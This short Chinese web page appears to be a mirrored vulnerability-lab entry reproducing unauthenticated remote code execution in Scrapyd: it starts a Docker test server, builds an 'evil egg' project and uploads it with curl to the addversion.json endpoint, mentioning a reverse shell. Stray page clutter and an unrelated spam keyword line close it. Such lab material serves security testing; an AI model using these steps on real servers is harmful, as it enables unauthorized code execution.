<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Scrapyd未經身份驗證的遠程代碼執行(Scrapyd Unauthenticated Remote Code Execution)

    Path scrapy/scrapyd-unacc

    Scrapyd Unauthenticated Remote Code Execution

    Start server 啟動服務器

    執行以下命令以啟動scrapyd服務器:

    docker-compose up -d

    部署scrapyd之后,服務器正在監聽 http://your-ip:6800

    Reproduce 復制

    建立一個 evil egg archive:

    pip install scrapy scrapyd-client
    scrapy startproject evil
    cd evil
    # edit evil/__init__.py, add evil code
    scrapyd-deploy --build-egg=evil.egg

    上傳 evil egg 到scrapyd服務器:

    curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg

    可以反彈shell

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类